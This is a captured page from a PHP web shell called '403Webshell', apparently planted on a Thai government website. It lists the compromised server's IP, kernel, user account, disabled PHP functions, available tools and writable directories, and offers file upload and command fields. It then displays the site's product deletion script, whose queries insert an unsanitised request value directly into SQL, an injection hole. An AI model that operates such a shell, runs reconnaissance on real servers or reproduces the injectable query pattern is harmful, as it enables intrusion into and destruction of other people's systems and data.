403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.139.94.189
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/product/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/product/product_del.php
<?php
import_request_variables('pG', 'p_');
if($p_id_product!="")						{	     $id_product=trim($p_id_product);				}

bar_header("ลบข้อมูล");

if(id_top_permission("g"))
{
		delete_product($id_product);
}

echo "<center><br><br>ลบข้อมูลเรียบร้อยแล้ว<br><br></center>"; 
		echo "<meta http-equiv='refresh' content='2; url=index.php?mod=product_firstpage&path=product'>" ;


function delete_product($my_id_product){

global $_SESSION;
	 $sql = "SELECT * FROM cms_product WHERE id_product = $my_id_product";
	$res = mysql_query ($sql) or die (mysql_error());
	
	while ($del = mysql_fetch_array ($res))
	{
		$sql2 = "SELECT * FROM cms_product WHERE id_parent = $del[id_product]";
		$res2 = mysql_query ($sql2) or die (mysql_error());
		while ($del2 = mysql_fetch_array ($res2))
		{
			delete_product($del2[id_product]);
		}
		
		if($del[data_type]==1){ // main delete
			$sql_main = "SELECT * FROM cms_product WHERE id_product = ".$del[id_product];
			$res_main = mysql_query ($sql_main);
			$dat_main = mysql_fetch_object ($res_main);
			
			
			if(file_exists($_SESSION[web_name]."/module_product/picture_main/".$del[picture]))
			{
				@unlink($_SESSION[web_name]."/module_product/picture_main/".$del[picture]);
			}
			 $sql_del_main = "DELETE FROM cms_product WHERE id_product = ".$dat_main->id_product;
			
			mysql_query ($sql_del_main) or die ("xxxx");
			
			
			$sql_count = "SELECT COUNT(*) as num FROM cms_product WHERE id_parent = ".$del[id_parent];
			$res_count = mysql_query ($sql_count) or die ("xxx");
			$dat_count = mysql_fetch_object ($res_count);
			$num_child = $dat_count->num;
			if ($num_child == 0)
			{
				$sql_update = "UPDATE cms_product SET has_child = 0 WHERE id_product = ".$del[id_parent];
				mysql_query ($sql_update) or die ("zzzz");
			}	
			
			
		}
		
		// =====================================================================================
		
		
		if($del[data_type]==2){ // sub delete
		if(file_exists($_SESSION[web_name]."/module_product/picture/".$del[picture]))
			{
				@unlink($_SESSION[web_name]."/module_product/picture/".$del[picture]);
			}
			if(file_exists($_SESSION[web_name]."/module_product/attach/".$del[attach_file]))
			{
				@unlink($_SESSION[web_name]."/module_product/attach/".$del[attach_file]);
			}
			
			$sql_del = "DELETE FROM cms_product WHERE id_product=$del[id_product] and is_static=0";
			mysql_query ($sql_del) or die (mysql_error());
			
			$sql_count = "SELECT COUNT(*) as num FROM cms_product WHERE id_parent = ".$del[id_parent];
			$res_count = mysql_query ($sql_count) or die ("xxx");
			$dat_count = mysql_fetch_object ($res_count);
			$num_child = $dat_count->num;
			if ($num_child == 0)
			{
				$sql_update = "UPDATE cms_product SET has_child = 0 WHERE id_product = ".$del[id_parent];
				mysql_query ($sql_update) or die ("zzzz");
			}	
		
		}
		
		
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit